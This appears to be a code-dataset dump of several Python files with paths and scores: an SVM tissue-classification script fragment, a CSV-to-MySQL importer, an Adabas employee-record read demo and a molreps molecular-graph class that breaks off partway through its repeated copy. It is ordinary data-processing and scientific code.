dic_community[f_name]['acc'] = score.mean()
dic_community[f_name]['acc_std'] = score.std()
print("Accuracy: %.4f (%.4f)" % (score.mean(), score.std()))
score = scores['test_f1']
dic_community[f_name]['f1'] = score.mean()
dic_community[f_name]['f1_std'] = score.std()
print("F1 score: %.4f (%.4f)" % (score.mean(), score.std()))
score = scores['test_roc_auc']
dic_community[f_name]['roc'] = score.mean()
dic_community[f_name]['roc_std'] = score.std()
print("ROC AUC: %.4f (%.4f)" % (score.mean(), score.std()))
pickle.dump(dic_community, open("svm_results/" + tissue_name + '_' + str(community_id) + ".pkl", "wb"))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--tissue_num", type=int,
help='Tissue number in the TISSUES array (from definitions module), on which the code will be executed')
args = parser.parse_args()
print("Going with", TISSUES[args.tissue_num])
# Creating the whole table
all_pandas = []
for f_name in sorted(TISSUES):
pd_tmp = pd.read_csv("data_filtered/only_geneids_CORRECTED_" + f_name + ".csv", index_col=0)
pd_tmp.rename(index=lambda x: x + "_" + f_name, inplace=True)
all_pandas.append(pd_tmp)
all_df = pd.concat(all_pandas, sort=False)
# Manually making the scaling because of NaNs
all_df = all_df.sub(all_df.min()).div((all_df.max() - all_df.min()))
all_df.fillna(0, inplace=True)
# Adding tissue information to the dataframe
def label_race(row):
splitted = row.name.split('_')
term = ""
for i in range(1, len(splitted)):
term += "_" + splitted[i]
return term
all_df['tissue'] = all_df.apply(lambda row: label_race(row), axis=1)
calculate_svm(TISSUES[args.tissue_num]) | 0.486332 | 0.280486 |
import mysql.connector
import csv
import sys
import boto3
from messytables import CSVTableSet, type_guess, \
types_processor, headers_guess, headers_processor, \
offset_processor, any_tableset
# A table set is a collection of tables:
def csvParse(csv_file_path):
fh = open(csv_file_path, 'rb')
# Load a file object:
table_set = CSVTableSet(fh)
row_set = table_set.tables[0]
# guess header names and the offset of the header:
offset, headers = headers_guess(row_set.sample)
row_set.register_processor(headers_processor(headers))
# add one to begin with content, not the header:
row_set.register_processor(offset_processor(offset + 1))
# guess column types:
types = type_guess(row_set.sample, strict=True)
row_set.register_processor(types_processor(types))
return row_set, headers, offset, types
def transformHeaderString(header_name):
return header_name
def transformHeaderType(header_type):
if str(header_type) == 'String':
return 'TEXT'
elif str(header_type) == 'Integer':
return 'INTEGER'
else:
return 'TEXT'
def generateInsertSQL(table_name, headers, types):
insert_sql = 'INSERT INTO ' + table_name + '('
for col in headers:
insert_sql = insert_sql + transformHeaderString(col) + ', '
insert_sql = insert_sql[:len(insert_sql)-2] + ') VALUES ('
for i in range(len(headers)):
#insert_sql = insert_sql + ' %s::' + transformHeaderType(types[i]) + ', '
insert_sql = insert_sql + ' %s, '
return insert_sql[:len(insert_sql)-2] + ')'
def generateCreateTableSQL(table_name, headers, types):
create_table_sql = 'CREATE TABLE ' + table_name + '('
for i in range(len(headers)):
create_table_sql = create_table_sql + ('' + transformHeaderString(headers[i])) + ' ' + ('' + transformHeaderType(types[i])) + ', '
return create_table_sql[:len(create_table_sql)-2] + ')'
row_set, headers, offset, types = csvParse(sys.argv[1])
create_table_sql = generateCreateTableSQL('SSTABLE', headers, types);
'''
outputDB = mysql.connector.connect(
host=sys.argv[2],
user=sys.argv[3],
password=sys.argv[4]
database=sys.argv[5]
)
'''
outputDB = mysql.connector.connect(
user=sys.argv[2],
database=sys.argv[3]
)
table_name = 'SSTABLE'
outputCursor = outputDB.cursor(prepared=True)
outputCursor.execute('DROP TABLE IF EXISTS ' + table_name)
outputCursor.execute(create_table_sql)
insert_sql = generateInsertSQL(table_name, headers, types)
row_count = 0;
for row in row_set:
row_count = row_count+1
if row_count > 10000:
exit
param_tuple = ()
for cell in row:
param_tuple = param_tuple + (cell.value,)
outputCursor.execute(insert_sql, param_tuple)
outputCursor.close() | import.py | import mysql.connector
import csv
import sys
import boto3
from messytables import CSVTableSet, type_guess, \
types_processor, headers_guess, headers_processor, \
offset_processor, any_tableset
# A table set is a collection of tables:
def csvParse(csv_file_path):
fh = open(csv_file_path, 'rb')
# Load a file object:
table_set = CSVTableSet(fh)
row_set = table_set.tables[0]
# guess header names and the offset of the header:
offset, headers = headers_guess(row_set.sample)
row_set.register_processor(headers_processor(headers))
# add one to begin with content, not the header:
row_set.register_processor(offset_processor(offset + 1))
# guess column types:
types = type_guess(row_set.sample, strict=True)
row_set.register_processor(types_processor(types))
return row_set, headers, offset, types
def transformHeaderString(header_name):
return header_name
def transformHeaderType(header_type):
if str(header_type) == 'String':
return 'TEXT'
elif str(header_type) == 'Integer':
return 'INTEGER'
else:
return 'TEXT'
def generateInsertSQL(table_name, headers, types):
insert_sql = 'INSERT INTO ' + table_name + '('
for col in headers:
insert_sql = insert_sql + transformHeaderString(col) + ', '
insert_sql = insert_sql[:len(insert_sql)-2] + ') VALUES ('
for i in range(len(headers)):
#insert_sql = insert_sql + ' %s::' + transformHeaderType(types[i]) + ', '
insert_sql = insert_sql + ' %s, '
return insert_sql[:len(insert_sql)-2] + ')'
def generateCreateTableSQL(table_name, headers, types):
create_table_sql = 'CREATE TABLE ' + table_name + '('
for i in range(len(headers)):
create_table_sql = create_table_sql + ('' + transformHeaderString(headers[i])) + ' ' + ('' + transformHeaderType(types[i])) + ', '
return create_table_sql[:len(create_table_sql)-2] + ')'
row_set, headers, offset, types = csvParse(sys.argv[1])
create_table_sql = generateCreateTableSQL('SSTABLE', headers, types);
'''
outputDB = mysql.connector.connect(
host=sys.argv[2],
user=sys.argv[3],
password=sys.argv[4]
database=sys.argv[5]
)
'''
outputDB = mysql.connector.connect(
user=sys.argv[2],
database=sys.argv[3]
)
table_name = 'SSTABLE'
outputCursor = outputDB.cursor(prepared=True)
outputCursor.execute('DROP TABLE IF EXISTS ' + table_name)
outputCursor.execute(create_table_sql)
insert_sql = generateInsertSQL(table_name, headers, types)
row_count = 0;
for row in row_set:
row_count = row_count+1
if row_count > 10000:
exit
param_tuple = ()
for cell in row:
param_tuple = param_tuple + (cell.value,)
outputCursor.execute(insert_sql, param_tuple)
outputCursor.close() | 0.257298 | 0.152001 |
import string
import adabas
from adabas.api import *
from adabas.datamap import *
from adabas.dump import *
DBID=8;FNR=11 # Employees file mf
#DBID=12;FNR=11 # Employees file pcmm2
STARTISN=0
RCOUNT=1100
MULTIFETCH=8 # number of records per call: MULTI FETCH if > 1
USEACBX=1
# define the mapping of data in record buffer to attributes
# of EmpTel class
emp = Datamap( 'EmployeeTeleLine',
String('persid' , 8),
String('firstname' , 20),
String('initial' , 20),
String('lastname' , 20),
String('birth' , 8),
String('country' , 3),
String('areacode' , 6),
String('phone' , 15),
String('department', 6),
String('jobtitle' , 25))
name=''
dept=''
MULTIFETCH=int(raw_input('Enter MULTIFETCH number:'))
empsize=emp.getsize()
print 'One employees record has %d bytes' % empsize
if MULTIFETCH <=1:
MULTIFETCH=1
rbl1=empsize*MULTIFETCH
if USEACBX:
mbl1=4+16*MULTIFETCH
c1=Adabasx(rbl=rbl1,fbl=64,sbl=32,vbl=128,mbl=mbl1,multifetch=MULTIFETCH)
c1.dumprb=1;c1.dumpcb=1;c1.dumpmb=1;c1.dumpfb=c1.dumpsb=c1.dumpvb=1
c1.acb=c1.acbx
else:
ibl1=4+16*MULTIFETCH
c1=Adabas(rbl=rbl1,fbl=64,sbl=32,vbl=128,ibl=ibl1,multifetch=MULTIFETCH)
c1.dumpcb=1;c1.dumprb=1;c1.dumpib=1
c1.cb.dbid=DBID
c1.cb.fnr=FNR
c1.cb.cid='EMPL'
print '\nSelect Employees file %d on database %d' % (FNR, DBID)
while name == '' and dept=='':
name=raw_input('Enter EMPTEL Selection values for NAME:')
if len(name) > 0:
print ' with name=%s' % name
c1.searchfield('AE,20', 20, name)
break
dept=raw_input('Enter EMPTEL Selection values for DEPARTMENT (e.g. SALE10):')
if len(dept) > 0:
print ' with department=%s' % dept
c1.searchfield('AO', 6, name)
break
c1.sb.write('.')
dump(c1.vb, header='Value Buffer')
c1.cb.cmd='L3'
c1.cb.op2='A' # ascending
c1.cb.ad1=c1.sb[0:2] # search descriptor
if MULTIFETCH>1:
c1.cb.op1='M' # M multifetch
# write to buffer starting with pos. 0
c1.fb.write('AA,AC,AD,AE,AH,8,U,AL,AN,AM,AO,AP.')
count=0 # number of returned records
cstart=time.clock()
try:
c1.dumpbefore=1
mf=c1.multifetch(emp) # generator
while mf.next(): # rl has record length
count+=1
birthdate=emp.birth
#"""
print '%4d %s %-30s %-3s %-6s %-15s %s %s-%s-%s %s'\
%(c1.cb.isn, emp.persid,
# string.capwords(emp.lastname+', '+emp.firstname+' '+emp.initial),
emp.lastname+', '+emp.firstname+' '+emp.initial,
emp.country,emp.areacode,emp.phone,
emp.department,
birthdate[0:4],birthdate[4:6],birthdate[6:8],
string.capwords(emp.jobtitle))
#"""
except DataEnd:
print 'Sequential Read by desciptor returned', count, 'record(s).'
pass
except DatabaseError, (line, apa):
print line
dump(apa.acb, header='Control Block')
dump(apa.sb, header='Search Buffer')
dump(apa.vb, header='Value Buffer')
dump(apa.fb, header='Format Buffer')
dump(apa.rb, header='Record Buffer')
dump(apa.mb, header='Multifetch Buffer')
print 'Read time %f sec' % (time.clock() - cstart,) | Adabas/demo/Emptel/EmptelReadByDescriptorMF.py |
import string
import adabas
from adabas.api import *
from adabas.datamap import *
from adabas.dump import *
DBID=8;FNR=11 # Employees file mf
#DBID=12;FNR=11 # Employees file pcmm2
STARTISN=0
RCOUNT=1100
MULTIFETCH=8 # number of records per call: MULTI FETCH if > 1
USEACBX=1
# define the mapping of data in record buffer to attributes
# of EmpTel class
emp = Datamap( 'EmployeeTeleLine',
String('persid' , 8),
String('firstname' , 20),
String('initial' , 20),
String('lastname' , 20),
String('birth' , 8),
String('country' , 3),
String('areacode' , 6),
String('phone' , 15),
String('department', 6),
String('jobtitle' , 25))
name=''
dept=''
MULTIFETCH=int(raw_input('Enter MULTIFETCH number:'))
empsize=emp.getsize()
print 'One employees record has %d bytes' % empsize
if MULTIFETCH <=1:
MULTIFETCH=1
rbl1=empsize*MULTIFETCH
if USEACBX:
mbl1=4+16*MULTIFETCH
c1=Adabasx(rbl=rbl1,fbl=64,sbl=32,vbl=128,mbl=mbl1,multifetch=MULTIFETCH)
c1.dumprb=1;c1.dumpcb=1;c1.dumpmb=1;c1.dumpfb=c1.dumpsb=c1.dumpvb=1
c1.acb=c1.acbx
else:
ibl1=4+16*MULTIFETCH
c1=Adabas(rbl=rbl1,fbl=64,sbl=32,vbl=128,ibl=ibl1,multifetch=MULTIFETCH)
c1.dumpcb=1;c1.dumprb=1;c1.dumpib=1
c1.cb.dbid=DBID
c1.cb.fnr=FNR
c1.cb.cid='EMPL'
print '\nSelect Employees file %d on database %d' % (FNR, DBID)
while name == '' and dept=='':
name=raw_input('Enter EMPTEL Selection values for NAME:')
if len(name) > 0:
print ' with name=%s' % name
c1.searchfield('AE,20', 20, name)
break
dept=raw_input('Enter EMPTEL Selection values for DEPARTMENT (e.g. SALE10):')
if len(dept) > 0:
print ' with department=%s' % dept
c1.searchfield('AO', 6, name)
break
c1.sb.write('.')
dump(c1.vb, header='Value Buffer')
c1.cb.cmd='L3'
c1.cb.op2='A' # ascending
c1.cb.ad1=c1.sb[0:2] # search descriptor
if MULTIFETCH>1:
c1.cb.op1='M' # M multifetch
# write to buffer starting with pos. 0
c1.fb.write('AA,AC,AD,AE,AH,8,U,AL,AN,AM,AO,AP.')
count=0 # number of returned records
cstart=time.clock()
try:
c1.dumpbefore=1
mf=c1.multifetch(emp) # generator
while mf.next(): # rl has record length
count+=1
birthdate=emp.birth
#"""
print '%4d %s %-30s %-3s %-6s %-15s %s %s-%s-%s %s'\
%(c1.cb.isn, emp.persid,
# string.capwords(emp.lastname+', '+emp.firstname+' '+emp.initial),
emp.lastname+', '+emp.firstname+' '+emp.initial,
emp.country,emp.areacode,emp.phone,
emp.department,
birthdate[0:4],birthdate[4:6],birthdate[6:8],
string.capwords(emp.jobtitle))
#"""
except DataEnd:
print 'Sequential Read by desciptor returned', count, 'record(s).'
pass
except DatabaseError, (line, apa):
print line
dump(apa.acb, header='Control Block')
dump(apa.sb, header='Search Buffer')
dump(apa.vb, header='Value Buffer')
dump(apa.fb, header='Format Buffer')
dump(apa.rb, header='Record Buffer')
dump(apa.mb, header='Multifetch Buffer')
print 'Read time %f sec' % (time.clock() - cstart,) | 0.199971 | 0.060474 |
import networkx as nx
import numpy as np
from molreps.methods.geo_npy import add_edges_reverse_indices
# Rdkit
try:
import rdkit
import rdkit.Chem.Descriptors
import rdkit.Chem.AllChem
MOLGRAPH_RDKIT_AVAILABLE = True
from molreps.methods.mol_rdkit import rdkit_atom_list, rdkit_bond_list, rdkit_bond_distance_list
from molreps.methods.mol_rdkit import rdkit_mol_from_atoms_bonds, rdkit_add_conformer
except ModuleNotFoundError:
print("Warning: Rdkit not found for mol class.")
MOLGRAPH_RDKIT_AVAILABLE = False
# openbabel
try:
from openbabel import openbabel
MOLGRAPH_OPENBABEL_AVAILABLE = True
from molreps.methods.mol_pybel import ob_get_bond_table_from_coordinates
except ModuleNotFoundError:
print("Warning: Openbabel not found for mol class.")
MOLGRAPH_OPENBABEL_AVAILABLE = False
if MOLGRAPH_RDKIT_AVAILABLE:
def rdkit_get_property_atoms(mol, key, prop, **kwargs):
atom_fun_dict = {
"AtomicNum": rdkit.Chem.rdchem.Atom.GetAtomicNum,
"Symbol": rdkit.Chem.rdchem.Atom.GetSymbol,
"NumExplicitHs": rdkit.Chem.rdchem.Atom.GetNumExplicitHs,
"NumImplicitHs": rdkit.Chem.rdchem.Atom.GetNumImplicitHs,
"IsAromatic": rdkit.Chem.rdchem.Atom.GetIsAromatic,
"TotalDegree": rdkit.Chem.rdchem.Atom.GetTotalDegree,
"TotalValence": rdkit.Chem.rdchem.Atom.GetTotalValence,
"Mass": rdkit.Chem.rdchem.Atom.GetMass,
"IsInRing": rdkit.Chem.rdchem.Atom.IsInRing,
"Hybridization": rdkit.Chem.rdchem.Atom.GetHybridization,
"ChiralTag": rdkit.Chem.rdchem.Atom.GetChiralTag,
"FormalCharge": rdkit.Chem.rdchem.Atom.GetFormalCharge,
"ImplicitValence": rdkit.Chem.rdchem.Atom.GetImplicitValence,
"NumRadicalElectrons": rdkit.Chem.rdchem.Atom.GetNumRadicalElectrons,
}
if prop in atom_fun_dict:
return rdkit_atom_list(mol, key, atom_fun_dict[prop])
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
def rdkit_get_property_bonds(mol, key, prop, **kwargs):
bond_fun_dict = {
"BondType": rdkit.Chem.rdchem.Bond.GetBondType,
"IsAromatic": rdkit.Chem.rdchem.Bond.GetIsAromatic,
"IsConjugated": rdkit.Chem.rdchem.Bond.GetIsConjugated,
"IsInRing": rdkit.Chem.rdchem.Bond.IsInRing,
"Stereo": rdkit.Chem.rdchem.Bond.GetStereo
}
if prop in bond_fun_dict:
return rdkit_bond_list(mol, key, bond_fun_dict[prop])
elif prop == "Distance":
return rdkit_bond_distance_list(mol, key, **kwargs)
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
def rdkit_get_property_molstate(mol, key, prop, **kwargs):
state_fun_dict = {
"ExactMolWt": rdkit.Chem.Descriptors.ExactMolWt
}
if prop in state_fun_dict:
return {key: state_fun_dict[prop](mol)}
elif prop == "NumAtoms":
return {key: mol.GetNumAtoms()}
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
# Main class to make graph
class MolGraph(nx.Graph):
"""Molecular Graph which inherits from networkx graph."""
_mols_implemented = {'rdkit': {
'nodes': ["AtomicNum", "Symbol", "NumExplicitHs","NumImplicitHs","IsAromatic","TotalDegree",
"TotalValence","Mass", "IsInRing","Hybridization", "ChiralTag", "FormalCharge",
"ImplicitValence", "NumRadicalElectrons"],
'edges': ["BondType","IsAromatic","IsConjugated","IsInRing","Stereo","Distance"],
'state': ["NumAtoms", "ExactMolWt"]}
}
def __init__(self, mol=None, **kwargs):
super(MolGraph, self).__init__(**kwargs)
self.mol = mol
# State Variable
self._graph_state = {}
self.mol_type = None
if isinstance(mol, rdkit.Chem.Mol):
self.mol_type = "rdkit"
# Check for identifier
def _make_edges(self, key, propy, **args):
if self.mol_type == "rdkit":
self.add_edges_from(rdkit_get_property_bonds(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def _make_nodes(self, key, propy, **args):
if self.mol_type == "rdkit":
self.add_nodes_from(rdkit_get_property_atoms(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def _make_state(self, key, propy, **args):
if self.mol_type == "rdkit":
self._graph_state.update(rdkit_get_property_molstate(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def make(self,
nodes=None,
edges=None,
state=None
):
"""
Construct graph from mol instance.
The input is a dictionary of properties to calculate. The dict-key
can be chosen freely and will be graph attributes.
The identifier is a string for built-in function e.g. 'proton'. Or if args have to be provided:
key : {'class': identifier, 'args':{ args_dict }}
Otherwise you can provide a custom method via the the identifier dict of the form:
key : {'class': function/class, 'args':{ args_dict }}
The callable object of 'class' must accept as first argument this instance.
Then key=key and then additional args from 'args':{ args_dict }.
Args:
nodes (dict, optional): Properties for nodes. Defaults to {'proton' : "proton" }
edges (dict, optional): Properties for edges. Defaults to
{'bond': 'bond'} or {'distance': {'class': 'distance', 'args': {}}
state (dict, optional): Properties for graph state. Defaults to {'size' : 'size'}
Raises:
AttributeError: If mol not found.
ValueError: If identifier dict is incorrect.
TypeError: If property info is incorrect.
Returns:
self: This instance.
"""
# Set defaults if None
if self.mol is None:
raise AttributeError("Initialize Molecule before making graph")
if nodes is None:
nodes = [self._mols_implemented[self.mol_type]['nodes'][0]]
if edges is None:
edges = [self._mols_implemented[self.mol_type]['edges'][0]]
if state is None:
state = [self._mols_implemented[self.mol_type]['state'][0]]
# Make default keys if only list is inserted
if isinstance(nodes, list) or isinstance(nodes, tuple):
nodes_dict = {}
for x in nodes:
if isinstance(x, str):
nodes_dict.update({x: x})
elif isinstance(x, dict):
nodes_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict but got", x)
nodes = nodes_dict
if isinstance(edges, list) or isinstance(edges, tuple):
edges_dict = {}
for x in edges:
if isinstance(x, str):
edges_dict.update({x: x})
elif isinstance(x, dict):
edges_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict serialized, but got", x)
edges = edges_dict
if isinstance(state, list) or isinstance(state, tuple):
state_dict = {}
for x in state:
if isinstance(x, str):
state_dict.update({x: x})
elif isinstance(x, dict):
state_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict but got", x)
state = state_dict
for key, value in nodes.items():
if isinstance(value, str):
self._make_nodes(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
if isinstance(value['class'], str):
args = value['args'] if 'args' in value else {}
self._make_nodes(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
'args' : {'value' : 0} }, with optional args but got",
value, "instead")
for key, value in edges.items():
if isinstance(value, str):
self._make_edges(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
if isinstance(value['class'], str):
args = value['args'] if 'args' in value else {}
self._make_edges(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
'args' : {'value' : 0} }, with optinal args but got",
value, "instead")
for key, value in state.items():
if isinstance(value, str):
self._make_state(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
if isinstance(value['class'], str):
args = value['args'] if 'args' in value else {}
self._make_state(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
'args' : {'value' : 0} }, with optinal args but got",
value, "instead")
return self
def to_tensor(self,
nodes=None,
edges=None,
state=None,
trafo_nodes=None,
trafo_edges=None,
trafo_state=None,
default_nodes=None,
default_edges=None,
default_state=None,
out_tensor=np.array
):
"""
Convert the nx graph into a dict of tensors which can be directly used for GCN.
The desired attributes must be given with a suitable conversion function plus default value.
Here, one can add also the type of tensor or one-Hot mappings etc. and its default/zero state,
if the attributes is not specified for a specific node/edge. The properties are always mapped to numpy arrays
and then converted to out_tensor.
Args:
nodes (list, optional): Nodes properties. Defaults to ['proton'].
edges (list, optional): Edge properties. Defaults to ['bond'].
state (list, optional): State Properties. Defaults to ['size'].
trafo_nodes (dict, optional): Transformation function for nodes. Defaults to np.array.
trafo_edges (dict, optional): Transformation function for edges. Defaults to np.array.
trafo_state (dict, optional): Transformation function for state. Defaults to np.array.
default_nodes (dict, optional): Zero Nodes properties. Defaults to np.array(0).
default_edges (dict, optional): Zero Edge properties. Defaults to np.array(0).
default_state (dict, optional): Zero State Properties. Defaults to np.array(0).
out_tensor (func) : Final Function for each node/edge/state. Default is np.array.
Returns:
dict: Graph tensors as dictionary.
"""
if nodes is None:
nodes = [self._mols_implemented[self.mol_type]['nodes'][0]]
if edges is None:
edges = [self._mols_implemented[self.mol_type]['edges'][0]]
if state is None:
state = [self._mols_implemented[self.mol_type]['state'][0]]
if trafo_nodes is None:
trafo_nodes = {}
if trafo_edges is None:
trafo_edges = {}
if trafo_state is None:
trafo_state = {}
if default_nodes is None:
default_nodes = {}
if default_edges is None:
default_edges = {}
if default_state is None:
default_state = {}
for x in nodes:
if x not in trafo_nodes:
trafo_nodes[x] = np.array
for x in edges:
if x not in trafo_edges:
trafo_edges[x] = np.array
for x in state:
if x not in trafo_state:
trafo_state[x] = np.array
for x in nodes:
if x not in default_nodes:
default_nodes[x] = np.array(0.0)
for x in edges:
if x not in default_edges:
default_edges[x] = np.array(0.0)
for x in state:
if x not in default_state:
default_state[x] = np.array(0.0)
outn = []
oute = []
outs = []
out_a = nx.to_numpy_array(self)
node_idx = np.array(list(self.nodes), dtype=np.int)
edge_idx = np.array(list(self.edges), dtype=np.int)
for i in node_idx:
current_node = []
for key in nodes:
if key in self.nodes[i]:
current_node.append(trafo_nodes[key](self.nodes[i][key]))
else:
current_node.append(default_nodes[key])
outn.append(current_node)
outn = np.array(outn)
for i in edge_idx:
current_edge = []
for key in edges:
if key in self.edges[i]:
current_edge.append(trafo_edges[key](self.edges[i][key]))
else:
current_edge.append(default_edges[key])
oute.append(current_edge)
oute = np.array(oute)
for key in state:
if key in self._graph_state:
outs.append(trafo_state[key](self._graph_state[key]))
else:
outs.append(default_state[key])
outs = np.array(outs)
# Make un-directed and sort edges and edge_index
outei, oute = add_edges_reverse_indices(edge_idx,oute)
return {"nodes": out_tensor(outn),
"edges": out_tensor(oute),
"state": out_tensor(outs),
"adjacency": out_tensor(out_a),
"indices": out_tensor(outei)}
# m = rdkit.Chem.MolFromSmiles("CC=O")
# test = MolGraph(m)
# test.make()
# nx.draw(test, with_labels=True)
# out = test.to_tensor() | molreps/graph.py | import networkx as nx
import numpy as np
from molreps.methods.geo_npy import add_edges_reverse_indices
# Rdkit
try:
import rdkit
import rdkit.Chem.Descriptors
import rdkit.Chem.AllChem
MOLGRAPH_RDKIT_AVAILABLE = True
from molreps.methods.mol_rdkit import rdkit_atom_list, rdkit_bond_list, rdkit_bond_distance_list
from molreps.methods.mol_rdkit import rdkit_mol_from_atoms_bonds, rdkit_add_conformer
except ModuleNotFoundError:
print("Warning: Rdkit not found for mol class.")
MOLGRAPH_RDKIT_AVAILABLE = False
# openbabel
try:
from openbabel import openbabel
MOLGRAPH_OPENBABEL_AVAILABLE = True
from molreps.methods.mol_pybel import ob_get_bond_table_from_coordinates
except ModuleNotFoundError:
print("Warning: Openbabel not found for mol class.")
MOLGRAPH_OPENBABEL_AVAILABLE = False
if MOLGRAPH_RDKIT_AVAILABLE:
def rdkit_get_property_atoms(mol, key, prop, **kwargs):
atom_fun_dict = {
"AtomicNum": rdkit.Chem.rdchem.Atom.GetAtomicNum,
"Symbol": rdkit.Chem.rdchem.Atom.GetSymbol,
"NumExplicitHs": rdkit.Chem.rdchem.Atom.GetNumExplicitHs,
"NumImplicitHs": rdkit.Chem.rdchem.Atom.GetNumImplicitHs,
"IsAromatic": rdkit.Chem.rdchem.Atom.GetIsAromatic,
"TotalDegree": rdkit.Chem.rdchem.Atom.GetTotalDegree,
"TotalValence": rdkit.Chem.rdchem.Atom.GetTotalValence,
"Mass": rdkit.Chem.rdchem.Atom.GetMass,
"IsInRing": rdkit.Chem.rdchem.Atom.IsInRing,
"Hybridization": rdkit.Chem.rdchem.Atom.GetHybridization,
"ChiralTag": rdkit.Chem.rdchem.Atom.GetChiralTag,
"FormalCharge": rdkit.Chem.rdchem.Atom.GetFormalCharge,
"ImplicitValence": rdkit.Chem.rdchem.Atom.GetImplicitValence,
"NumRadicalElectrons": rdkit.Chem.rdchem.Atom.GetNumRadicalElectrons,
}
if prop in atom_fun_dict:
return rdkit_atom_list(mol, key, atom_fun_dict[prop])
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
def rdkit_get_property_bonds(mol, key, prop, **kwargs):
bond_fun_dict = {
"BondType": rdkit.Chem.rdchem.Bond.GetBondType,
"IsAromatic": rdkit.Chem.rdchem.Bond.GetIsAromatic,
"IsConjugated": rdkit.Chem.rdchem.Bond.GetIsConjugated,
"IsInRing": rdkit.Chem.rdchem.Bond.IsInRing,
"Stereo": rdkit.Chem.rdchem.Bond.GetStereo
}
if prop in bond_fun_dict:
return rdkit_bond_list(mol, key, bond_fun_dict[prop])
elif prop == "Distance":
return rdkit_bond_distance_list(mol, key, **kwargs)
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
def rdkit_get_property_molstate(mol, key, prop, **kwargs):
state_fun_dict = {
"ExactMolWt": rdkit.Chem.Descriptors.ExactMolWt
}
if prop in state_fun_dict:
return {key: state_fun_dict[prop](mol)}
elif prop == "NumAtoms":
return {key: mol.GetNumAtoms()}
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
# Main class to make graph
class MolGraph(nx.Graph):
"""Molecular Graph which inherits from networkx graph."""
_mols_implemented = {'rdkit': {
'nodes': ["AtomicNum", "Symbol", "NumExplicitHs","NumImplicitHs","IsAromatic","TotalDegree",
"TotalValence","Mass", "IsInRing","Hybridization", "ChiralTag", "FormalCharge",
"ImplicitValence", "NumRadicalElectrons"],
'edges': ["BondType","IsAromatic","IsConjugated","IsInRing","Stereo","Distance"],
'state': ["NumAtoms", "ExactMolWt"]}
}
def __init__(self, mol=None, **kwargs):
super(MolGraph, self).__init__(**kwargs)
self.mol = mol
# State Variable
self._graph_state = {}
self.mol_type = None
if isinstance(mol, rdkit.Chem.Mol):
self.mol_type = "rdkit"
# Check for identifier
def _make_edges(self, key, propy, **args):
if self.mol_type == "rdkit":
self.add_edges_from(rdkit_get_property_bonds(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def _make_nodes(self, key, propy, **args):
if self.mol_type == "rdkit":
self.add_nodes_from(rdkit_get_property_atoms(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def _make_state(self, key, propy, **args):
if self.mol_type == "rdkit":
self._graph_state.update(rdkit_get_property_molstate(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def make(self,
nodes=None,
edges=None,
state=None
):
"""
Construct graph from mol instance.
The input is a dictionary of properties to calculate. The dict-key
can be chosen freely and will be graph attributes.
The identifier is a string for built-in function e.g. 'proton'. Or if args have to be provided:
key : {'class': identifier, 'args':{ args_dict }}
Otherwise you can provide a custom method via the the identifier dict of the form:
key : {'class': function/class, 'args':{ args_dict }}
The callable object of 'class' must accept as first argument this instance.
Then key=key and then additional args from 'args':{ args_dict }.
Args:
nodes (dict, optional): Properties for nodes. Defaults to {'proton' : "proton" }
edges (dict, optional): Properties for edges. Defaults to
{'bond': 'bond'} or {'distance': {'class': 'distance', 'args': {}}
state (dict, optional): Properties for graph state. Defaults to {'size' : 'size'}
Raises:
AttributeError: If mol not found.
ValueError: If identifier dict is incorrect.
TypeError: If property info is incorrect.
Returns:
self: This instance.
"""
# Set defaults if None
if self.mol is None:
raise AttributeError("Initialize Molecule before making graph")
if nodes is None:
nodes = [self._mols_implemented[self.mol_type]['nodes'][0]]
if edges is None:
edges = [self._mols_implemented[self.mol_type]['edges'][0]]
if state is None:
state = [self._mols_implemented[self.mol_type]['state'][0]]
# Make default keys if only list is inserted
if isinstance(nodes, list) or isinstance(nodes, tuple):
nodes_dict = {}
for x in nodes:
if isinstance(x, str):
nodes_dict.update({x: x})
elif isinstance(x, dict):
nodes_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict but got", x)
nodes = nodes_dict
if isinstance(edges, list) or isinstance(edges, tuple):
edges_dict = {}
for x in edges:
if isinstance(x, str):
edges_dict.update({x: x})
elif isinstance(x, dict):
edges_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict serialized, but got", x)
edges = edges_dict
if isinstance(state, list) or isinstance(state, tuple):
state_dict = {}
for x in state:
if isinstance(x, str):
state_dict.update({x: x})
elif isinstance(x, dict):
state_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict but got", x)
state = state_dict
for key, value in nodes.items():
if isinstance(value, str):
self._make_nodes(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
